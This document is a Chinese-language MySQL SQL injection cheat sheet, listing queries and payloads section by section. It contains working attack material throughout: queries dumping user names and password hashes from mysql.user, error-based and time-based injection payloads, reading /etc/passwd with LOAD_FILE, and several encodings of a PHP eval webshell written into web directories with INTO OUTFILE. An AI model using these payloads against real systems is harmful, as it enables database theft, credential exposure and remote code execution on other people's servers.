mysql > 基本环境信息
语句及说明
#获取版本号
SELECT @@version
SELECT version()
#主机名,IP地址
SELECT @@hostname;
#数据目录
SELECT @@datadir;
#用户名及密码
SELECT host, user, password FROM mysql.user;
#用户名
SELECT user();
SELECT system_user();
SELECT user FROM mysql.user;
mysql > 列举数据库
语句及说明
#当前库
SELECT database();
#所有库 (Mysql>5.0)
SELECT schema_name FROM information_schema.schemata;
mysql > 列举表名
语句及说明
#常规
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
#根据列名找表名
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
mysql > 列举字段名
语句及说明
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
mysql > 单条数据获取
语句及说明
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0;
SELECT host,user FROM user ORDER BY host LIMIT 0,1;
注射类型: 普通
适用环境: 常规
备注说明:
LIMIT 偏移,行数
LIMIT 行数 OFFSET 偏移
mysql > 用户权限相关
语句及说明
#列举用户权限
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
#列举用户权限
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user;
#列举数据库权限
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;
#列举 columns_priv
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;
注射类型: 普通
适用环境: 常规
备注说明:
#备注-mysql权限检查方式
1)先从user表中的host、 user、 password这3个字段中判断连接的IP、用户名、密码是否存在表中,存在则通过身份验证;
2)通过权限验证,进行权限分配时,按照user>db>tables_priv>columns_priv的顺序进行分配。即先检查全局权限表 user,如果user中对应的权限为Y,则此用户对所有数据库的权限都为Y,将不再检查db, tables_priv,columns_priv;如果为N,则到db表中检查此用户对应的具体数据库,并得到db中为Y的权限;如果db中为N,则检 查tables_priv中此数据库对应的具体表,取得表中的权限Y,以此类推。
mysql > 显错注入
语句及说明
#方式1
and (select 1 from (select count(*),concat(SQL语句,floor(rand(0)*2))x from information_schema.tables group by x)a);
#方式2
and (select count(*) from (select 1 union select null union select !1)x group by concat(sql语句,floor(rand(0)*2)));
#方式3
and extractvalue(1, concat(0x5c, (SQL语句)));
#方式4
and 1=(updatexml(1,concat(0x5e24,(SQL语句),0x5e24),1));
注射类型: 普通
适用环境: 常规
适用环境: 常规
备注说明:
对于1, 原始的报错语句如下:
select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;
count(*) x
1 5.1.28-rc-community1
1 5.1.28-rc-community0
1 5.1.28-rc-community1 <-- 出现重复的x值。报错。
mysql > 延时注入
语句及说明
SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(5); # >= 5.0.12
mysql > 文件读写
语句及说明
#读取文件,需要相关权限
UNION SELECT LOAD_FILE('/etc/passwd')
#写入文件,需要相关权限
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'
#写入文件,需要相关权限
SELECT * FROM mytable INTO outfile '/tmp/somefile'
注射类型: 常规(前提:权限,网站路径)
适用环境: 常规
适用环境: 常规
备注说明:
#小马形式1
?id=1 and 1=2 union select 1,'<?php eval(_POST[cmd])?>',3,4,5,6 into outfile '/xx/x.php'/*
#小马形式2
?id=1 and 1=2 union select 1,char(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62),3,4,5,6 into outfile '/xx/x.php'/*
#小马形式3
?id=1 and 1=2 union select 1,0x3C3F706870206576616C28245F504F53545B636D645D293F3E,3,4,5,6 into outfile '/www/home/html/coder.php'/*
mysql > 判断及字符串相关
语句及说明
#if判断
SELECT if(1=1,'foo','bar'); #返回foo
#case when 判断
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # 返回A
#char函数,将数字转变为字符
SELECT char(65); #返回A
#ascii函数,将字符转变为数字
SELECT ascii('A'); #返回65
#concat函数,将字符连接在一起
SELECT CONCAT('A','B'); #returns AB
#字符串的16进制写法
SELECT 0×414243; # 返回 ABC
#substring/substr函数
SELECT substr('abcd', 3, 1); #返回c
#length函数
SELECT length('abcd'); #返回4
mysql写文件into outfile
select * from admin where id =-1 union select 1,'<?php phpinfo();?>',3,4 into outfile 'c:\\1.php'
select * from admin where id =-1 or 1=1 limit 0,1 INTO OUTFILE 'c:/2.php' LINES TERMINATED BY 0x3C3F70687020706870696E666F28293B3F3E
